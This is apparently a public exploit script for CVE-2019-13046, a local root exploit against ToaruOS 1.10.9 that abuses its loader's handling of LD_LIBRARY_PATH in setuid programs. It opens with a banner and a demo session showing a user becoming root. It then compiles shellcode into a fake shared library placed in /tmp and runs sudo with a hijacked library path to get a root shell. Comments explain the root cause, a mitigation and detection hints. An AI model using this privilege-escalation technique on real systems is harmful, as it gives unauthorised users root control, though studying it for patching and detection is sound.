CVE-2019-13046: kowasuos/kowasu-linker.sh at master · mehsauce/kowasuos
linker/linker.c in ToaruOS through 1.10.9 has insecure LD_LIBRARY_PATH handling in setuid applications.
#!/bin/sh
The Mickey Mouse Hacking Squadron proudly presents
CVE-2019-13046
ToaruOS 1.10.9 sudo/linker local root exploit
.-“"”-.
/ . - \
\ /
.-“”-.,:.-_-.<
/ _; , / ).|
\ ; / ` `" '\
'.-| ;-.____, | .,
\ `._~_/ / /"/
,. /`-.__.-‘\`-._ ,",’ ;
\"\ / /| o \._ `-._; / ./-.
; ';, / / | `__ \ `-.,( / //.-'
:\ \\;_.-" ; |.-"` ``\ /-. /.-'
:\ .\),.-' / }{ | ‘…’
\ .-\ | , /
‘…’ ;’ , /
( __ `;–;’__`)
`//’` `||`
_// ||
.-"-._,(__) .(__).-“”-.
/ \ / \
\ / \ /
`’–=="–` `–""==–’`
local@livecd ~$ whoami
local
local@livecd ~$ ./kowasu-linker.sh
0@livecd /home/local# whoami
root
We use shellcode because we replaced libc and this keeps things simple.
# Writes a small C source to /tmp/x.c: a byte array named `shellcode` plus a
# function marked __attribute__((constructor)), which the C runtime invokes
# when the shared object is loaded, i.e. before the host program's main().
echo “unsigned char shellcode[] = {” > /tmp/x.c
echo " 0x31, 0xc0, 0x04, 0x18, 0x31, 0xdb, 0xcd, 0x7f, 0xeb, 0x1a, 0x5b, 0x31," >> /tmp/x.c
echo " 0xc0, 0x88, 0x43, 0x07, 0x89, 0x5b, 0x08, 0x89, 0x43, 0x0c, 0x04, 0x07," >> /tmp/x.c
echo " 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c, 0xcd, 0x7f, 0x31, 0xc0, 0xcd, 0x7f," >> /tmp/x.c
echo " 0xe8, 0xe1, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68," >> /tmp/x.c
echo " 0x68, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58" >> /tmp/x.c
echo “};” >> /tmp/x.c
# The constructor casts the byte array to a function pointer and calls it.
echo "__attribute__((constructor)) void mehness(void)" >> /tmp/x.c
echo “{” >> /tmp/x.c
echo " ((void (*)(void))shellcode)();" >> /tmp/x.c
echo “}” >> /tmp/x.c
# Build the source as a position-independent shared object, then remove it.
gcc -fPIC -shared /tmp/x.c -o /tmp/libc.so
rm /tmp/x.c
# Second copy under a name matching a library sudo presumably links against
# (libtoaru_auth). NOTE(review): which of the two names the loader actually
# resolves for sudo is not visible here -- confirm against sudo's dependencies.
cp /tmp/libc.so /tmp/libtoaru_auth.so
# Root cause per CVE-2019-13046: the ToaruOS loader (linker/linker.c, through
# 1.10.9) honoured LD_LIBRARY_PATH even for setuid programs, so a search path
# rooted in a user-writable directory such as /tmp lets an unprivileged user
# substitute any library a setuid binary loads. Mitigation on the loader side:
# ignore LD_LIBRARY_PATH and the other LD_* variables whenever the process is
# running with elevated privileges (euid != uid) -- the equivalent of glibc's
# secure-execution mode signalled by AT_SECURE.
LD_LIBRARY_PATH=/tmp
# sudo is setuid-root, so the substituted library's constructor runs as root
# during loading; this appears to happen before sudo looks at its arguments,
# making the command name given here immaterial -- the session in the banner
# above shows a root shell as the result. Detection hints for defenders:
# setuid binaries started with LD_LIBRARY_PATH pointing at a user-writable
# directory, and shared objects named after system libraries appearing in /tmp.
sudo mehness